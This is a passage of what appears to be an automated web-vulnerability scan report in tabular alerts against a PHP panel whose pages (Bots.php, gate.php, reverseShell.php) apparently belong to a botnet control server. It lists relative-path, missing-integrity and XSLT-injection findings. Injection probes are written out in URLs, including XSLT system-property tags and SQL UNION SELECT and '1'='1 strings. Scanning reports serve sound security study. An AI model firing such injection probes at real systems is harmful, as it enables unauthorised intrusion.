| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Evidence | <img src="Capture.PNG" alt="Logo"> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| Instances | 1 |
| Solution | Web servers and frameworks should be updated and configured not to serve responses to ambiguous URLs in a way that lets the relative path of such URLs be misinterpreted by components on either the client side or the server side. Within the application, correct use of the "<base>" HTML tag in the HTTP response will unambiguously specify the base URL for all relative URLs in the document. Use the "Content-Type" HTTP response header to make it harder for an attacker to force the web browser to misinterpret the content type of the response. Use the "X-Content-Type-Options: nosniff" HTTP response header to prevent the web browser from "sniffing" the content type of the response. Use a modern DOCTYPE such as "<!doctype html>" to prevent the page from being rendered in "Quirks Mode", since that causes the web browser to ignore the content type. Specify the "X-Frame-Options" HTTP response header to prevent Quirks Mode from being enabled in the web browser through framing attacks. |
| Reference | https://arxiv.org/abs/1811.00917, https://hsivonen.fi/doctype/, https://www.w3schools.com/tags/tag_base.asp |
| Tags | OWASP_2021_A05, OWASP_2017_A06 |
| CWE Id | 20 |
| WASC Id | 20 |
| Plugin Id | 10051 |
| Medium | Sub Resource Integrity Attribute Missing |
|---|---|
| Description | The integrity attribute is missing on a script or link tag that loads a resource from an external server. The integrity attribute prevents an attacker who has gained access to that external server from injecting malicious content into this site. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet"> |
| Request Header - size: 718 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 12,091 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 718 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 12,091 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet"> |
| Request Header - size: 646 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 17,675 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 646 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 17,675 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/chart.js"></script> |
| Request Header - size: 646 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 17,675 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script> |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet"> |
| Request Header - size: 741 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 741 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet"> |
| Request Header - size: 790 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 365 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 790 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 365 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet"> |
| Request Header - size: 543 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 367 bytes. | |
| Response Body - size: 14,616 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 543 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 367 bytes. | |
| Response Body - size: 14,616 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 95 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 95 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 95 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 95 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 95 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| Instances | 31 |
| Solution | Provide a valid integrity attribute to the tag. |
| Reference | https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity |
| Tags | OWASP_2021_A05 OWASP_2017_A06 |
| CWE Id | 345 |
| WASC Id | 15 |
| Plugin Id | 90003 |
| Medium | XSLT Injection |
|---|---|
| Description | Injection using XSL transformations may be possible, and may allow an attacker to read system information, read and write files, or execute arbitrary code. |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/Bots.php?id=54 |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 748 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/dashboard.php?id=54 |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 857 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/gate.php?bot=DESKTOP-95IQEEV |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 659 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 271 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 277 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi%20OR%201=1 |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 288 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi%25'%20%20-- |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 475 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi%25'%20%20--%20/Sound%20Effects |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 494 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 397 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi/Capture.PNG |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 475 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi/Sound%20Effects |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 293 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 489 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 799 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 714 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/tasks_page.php |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 509 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/tasks_page.php?id=54 |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 754 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 278 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E |
| Method | GET |
| Parameter | tasks_page.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 511 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 284 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi%20OR%201=1 |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 295 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi%25'%20%20-- |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 482 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi%25'%20%20--%20/Sound%20Effects |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 501 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
